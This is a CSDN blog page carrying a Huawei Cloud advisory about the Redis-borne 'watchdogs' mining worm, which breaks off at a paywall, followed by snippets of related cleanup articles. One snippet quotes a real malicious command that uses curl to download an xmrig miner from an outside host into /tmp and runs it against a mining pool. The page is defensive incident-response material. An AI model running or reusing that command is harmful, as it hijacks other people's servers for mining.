如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招

最新推荐文章于 2024-01-17 10:14:10 发布
最新推荐文章于 2024-01-17 10:14:10 发布
阅读量1.1k 收藏
点赞数
分类专栏: DCS 文章标签: Redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/middleware2018/article/details/87970013
版权

漏洞概述

近日,互联网出现watchdogs挖矿病毒,攻击者可以利用Redis未授权访问漏洞入侵服务器,通过内外网扫描感染更多机器。被感染的主机出现 crontab 任务异常、系统文件被删除、CPU 异常等情况,并且会自动感染更多机器,严重影响业务正常运行甚至导致崩溃。

在此,小哥建议您及时开展Redis业务自查并进行升级修复,避免业务和经济损失。

 

漏洞影响

1、数据泄露。Redis被远程控制,泄漏敏感业务数据

2、病毒感染。如果机器本身未加固,可通过Redis漏洞入侵主机资源,并进行系统破坏、文件删除、利用主机资源挖矿等恶性操作

 

产生漏洞条件

1、Redis全网监听,暴露于公网之上。自建Redis容易设置0.0.0.0:6379,在绑定EIP之后暴露在互联网上

2、Redis无密码或弱密码进行认证,容易被破解

3、Redis服务以root或高权限账户运行,可通过该用户修改 crontab 任务、执行挖矿操作,系统 netstat 等文件被篡改删除,同时会进一步遍历 known_hosts 中历史登录记录进行感染更多机器

 

加固建议

1、推荐使用华为云DCS Redis云服务,DCS默认已针对Redis进

最低0.47元/天 解锁文章
中间件小哥
关注
专栏目录
Linux流行病毒家族&清除方法集锦
qq_40907977的博客
05-25 1620
自2020年开始,深信服安全团队监测到Linux恶意软件挖矿事件大量增多,且有持续上升的趋势。 与Windows下五花八门的勒索病毒家族不同,Linux下感染量较大的恶意软件就几个家族。但这几个家族占据了全球大部分的感染主机,几乎呈现出垄断的趋势。本文将介绍Linux环境下7个较常见的流行恶意软件家族,以及其对应的清除步骤。 七大恶意软件家族 BillGates BillGates在2014年被首次发现,由于其样本多变量及函数包含字符串”gates”而得名,该病毒主要被黑客用于DDos,其特点是会替换系统
挖矿应急响应小结
bloodzer0
03-04 1055
背景:总结一下遇到挖矿时应该如何做应急响应与溯源分析。 1. 挖矿特征分析 当服务器或PC处于什么样的状态时,我们可以判定为被挖矿。通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下: 服务器或PC访问[过]不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的...
云服务器挖矿病毒watchdog记录
c_o_d_e_的博客
03-16 2242
晚上收到阿里云服务器被攻击的紧急邮件,登录控制台就发现遭到了恶意植入挖矿病毒,直接把我cpu资源吃完了,可恨。 主要是挖矿程序和恶意脚本代码执行,我把这六个问题分别截图,挨个来解决 一、挖矿程序 看这两个挖矿程序的PID相同,直接追踪目标吧。应该是通过恶意植入了一个文件。先通过top查看了资源情况,好家伙,直接抓到凶犯。 本想着直接kill -9杀掉该进程再说,但看了阿里云社区的相关案例,发现这种挖矿程序似乎还会出现,于是通过ls -l /proc/30282/exe找到了这个文..
解决Watchdogs 、kthrotlds 挖矿蠕虫
u010576019的博客
09-25 1063
在最近开发项目部署过程,发现项目运行缓慢,人员数过多情况下系统卡死。 查看服务器,top命令发现服务器毒 crontab -l 命令后发现也存在定时调度,打开定时调度文件/root/.systemd-init 发现文件为base64编码,我靠。文件如下: #!/bin/bash exec &>/dev/null sleep 119 echo ZXhlYyAmPi9kZXYvbnV...
记录一次watchdog挖矿
buzenmedi的专栏
06-29 651
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
华为云服务器,被植入挖矿病毒
测试工程师
01-21 6037
Watchdog,Linux 挖矿病毒新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Linux 挖矿病毒 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器
kdevtmpfsi挖矿病毒解决过程
weixin_43233341的博客
03-03 2928
top 开始cpu消耗在百分80左右,有时会达到99,杀掉进程后几分钟又跳出来, 开始的升级阿里云的高级版,一键查杀,cpu瞬间降到20 继续跟踪。。。 大概两个小时后发现,kdevtmpfsi进程会时不时跳出来,一两秒钟后又自动关闭,此时cpu 再百分20到百分40直接上下波动,如图(正常情况下是稳得) 解决方法 kdevtmpfsi有守护进程。守护进程名称为 kinsing,需要kill后才...
Python库 | watchdogs-1.6.9-py3-none-any.whl
03-25
`watchdogs-1.6.9-py3-none-any.whl` 是一个针对 Python 开发的库,名为 `watchdogs` 的版本 1.6.9。这个文件是一种特殊格式的归档,用于分发和安装 Python 包,称为 wheel 文件。在 Python 的生态系统,wheel ...
云服务器CPU一直高占用,病毒排查,服务器被黑,服务器挖矿病毒挖矿机xmrig病毒排查及解决
zhazha0807的博客
03-04 5098
收到阿里云发来的通知“【挖矿处置通知】请尽快整改云服务挖矿活动”,"经检测您的阿里云服务器上存在疑似挖矿活动……";盖帽的话不说了,直接上排查思路及解决方法; 1、先用top命令查看一下服务器资源情况,发现一个进程一直持续cpu:200%;记录下pid。然后先skill 掉试试,cpu恢复正常后,马上又启动了新进程; 2、然后推测是有定时任务或者某些机制进行触发的启动,先检测一下定时任务: 这里注意使用:crontab -l 查询到无定时任务,然后由于进程的User是 git ,然后换成: cro
云服务器挖矿病毒了怎么办?
编码人生
11-22 7495
今天早上一起来,收到几十条阿里云发过来的短信,说的是6379端口已被禁用,好家伙从我redis的端口进行植入病毒对吧,接着登录服务器里面用top命令查看 发现一切都是正常的情况,那我们到阿里云控制台去查看当前实例的情况 果然不出我所料,挖矿程序疯狂压榨我的服务器,导致服务器cup占用率都到100%了 好的,写作素材又有了 首先我们知道服务器挖矿病毒了,一般情况下挖矿病毒,有些病毒入侵较深的话,关联到系统底层组件,是很难彻底清除的.从安全角度不建议继续使用这个系统,可以做好快照的前提下,通过重置系
root账号设置文件权限失败原因 及解决方法
qq_36725627的博客
09-11 4564
root在修改相关文件java的属性的时候 chmod 777 java chmod: changing permissions of `java': Operation not permitted 首先先查看一下属性 lsattrjava ----ia-------- java 去除i这个属性 chattr -i java chattr -ajava chmod 777 java 添加...
Linux服务器发现挖矿程序清除办法
qq_33820379的博客
06-17 2436
1.查看目录是否有/tmp或者/temp可疑文件,删除文件,如果文件不是可删除的则使用chmod,如果chmod不行,查看llattr /tmp , 带i是无法删除的,请自行百度 执行以下命令移除i:chattr -i kthrotlds name php systemd .systemd-analyze .systemd-login thisxxs watchdogs xc.x86_64 ...
挖矿病毒解决
qq_37313531的博客
03-23 8031
1、进程 cpu 100% watchdog 2、解决 /tmp netstat(矿池、鱼池、sup)进程,文件主程序 crontab -l 计划任务 分析脚本 3、如何进来的? web日志、log4j、命令、漏洞:docker yam fastjiosn、邮件、下载恶意软件(doc、rar、恶意源、docker、wget) 4、定位 如何传播:蠕虫、ssh弱口令、内网ip探测工具、大量exp、Linux本身免密登陆、root高权限程序劫持、sodo 5、解决措施 下载样本、分析样
sphinx 配置文件全解析
weixin_33966095的博客
03-13 351
sphinx的配置文件是在配置的时候最容易出错的了: 我们先要明白几个概念: source:数据源,数据是从什么地方来的。 index:索引,当有数据源之后,从数据源处构建索引。索引实际上就是相当于一个字典检索。有了整本字典内容以后,才会有字典检索。 searchd:提供搜索查询服务。它一般是以deamon的形式运行在后台的。 indexer:构建索引的服务。当要重新构建索引的时候,就是调用in...
Watchbog挖矿病毒程序排查过程
qq_35718530的博客
04-25 2261
目录 第1章 情况 第2章 解决方案 2.1 修改/etc/hosts 2.2 防火墙控制出入流量 2.3 移除curl get脚本 2.4 删掉cron里面的相关任务 2.5 删除恶意命令 2.6 删除tmp目录下timesyncc.service文件 2.7 杀掉watchbog进程 第3章 总结 第1章 情况 1)服务器收到cpu报警,cpu被占用达到...
恶意挖矿木马防范指南
最新发布
hackzkaq的博客
01-17 284
近几年随着全球对虚拟货币的不断炒作,虚拟货币价格水涨船高,除主流比特币外,市场上涌现出了以太坊、莱特币、泰达币、艾达币等多个加密货币。“挖矿”的概念最早出现于本聪2008年发布的论文《比特币:一种点对点电子货币系统》,意为通过消耗CPU的计算时间和电力,以类似于黄金开采商消耗资源的方式,稳定获得一定数量的电子货币,是用算力(哈希)处理交易并获得奖励的过程。由于“挖矿”过程需要消耗大量的计算机资源,为了提高算力,国内市场上相继出现了CPU挖矿、GPU挖矿、FPGA挖矿、ASIC挖矿
watchdog杀死system_server导致系统重启问题分析流程
09-23 8738
下面是最近在解一个monkey测试过程系统重启的bug的分析过程,从这里我们可以看一下对于watchdog杀死死锁进程的一般分析流程。(这里当是一个笔记,没有详细按着文章的逻辑来整理词汇和语句 汗汗汗) 1. watchdog: Blocked in handler on ActivityManager (ActivityManager)       说明Activity
怎么使用看门狗对多个任务进行监测
06-03
您可以使用多个看门狗实例来监视多个任务。每个看门狗实例都应该有自己的名称和超时时间。您可以使用一个循环来定期检查每个任务的状态,并在任务超时时重新启动它们。以下是一个示例代码片段,用于同时监视两个任务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值